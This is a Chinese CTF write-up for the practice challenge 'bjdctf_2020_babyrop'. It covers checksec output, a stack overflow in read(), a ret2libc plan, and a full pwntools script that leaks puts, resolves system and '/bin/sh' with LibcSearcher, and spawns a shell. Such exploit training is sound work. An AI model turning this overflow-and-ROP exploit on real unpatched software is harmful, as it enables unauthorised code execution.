bjdctf_2020_babyrop
Ubuntu 16
0x01
checksec
1 2 3 4 5 6 [*] '/home/zelas/Desktop/pwn/bjdctf_2020_babyrop/bjdctf_2020_babyrop' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled //栈不可执行 PIE: No PIE (0x400000)
IDA
vuln()
1 2 3 4 5 6 7 ssize_t vuln () { char buf[32 ]; puts ("Pull up your sword and tell me u story!" ); return read(0 , buf, 0x64 uLL); \\read()函数存在栈溢出漏洞 }
0x02
思路 ret2libc x64
1.利用read()函数溢出 泄露puts()地址
2.利用LibcSearch计算出system()和bin_sh
3.再次执行main(),read()溢出至system()
s
0x20H
rbp
0x8
pop_rdi_ret
puts_got
ret
puts()
puts_ret
main()
s
0x20H
rbp
0x8
pop_rdi_ret
bin_sh
ret
system()
0x03
exp
libc6_2.23-0ubuntu10_amd64
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 from pwn import *from LibcSearcher import *context(os='linux' , arch='amd64' , log_level='debug' ) io = process(['./bjdctf_2020_babyrop' ]) elf = ELF('./bjdctf_2020_babyrop' ) padding = 0x20 + 0x8 puts_got = elf.got['puts' ] puts_plt = elf.plt['puts' ] main_addr = elf.symbols['main' ] pop_rdi_ret = 0x400733 payload = b'a' * padding + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr) delimeter = b'story!\n' io.sendlineafter(delimeter, payload) puts_addr = io.recv(6 ).ljust(8 ,b'\x00' ) puts_addr = u64(puts_addr) pause() print ('[+] puts_addr' , hex (puts_addr))libc = LibcSearcher('puts' , puts_addr) libc_base = puts_addr - libc.dump('puts' ) system = libc_base + libc.dump('system' ) bin_sh = libc_base + libc.dump('str_bin_sh' ) print ('[+] libc_base' , hex (libc_base))print ('[+] system' , hex (system))print ('[+] bin_sh' , hex (bin_sh))ret = 0x4004c9 payload1 = b'a' * padding + p64(pop_rdi_ret) + p64(bin_sh) + p64(system) io.sendline(payload1) io.interactive()
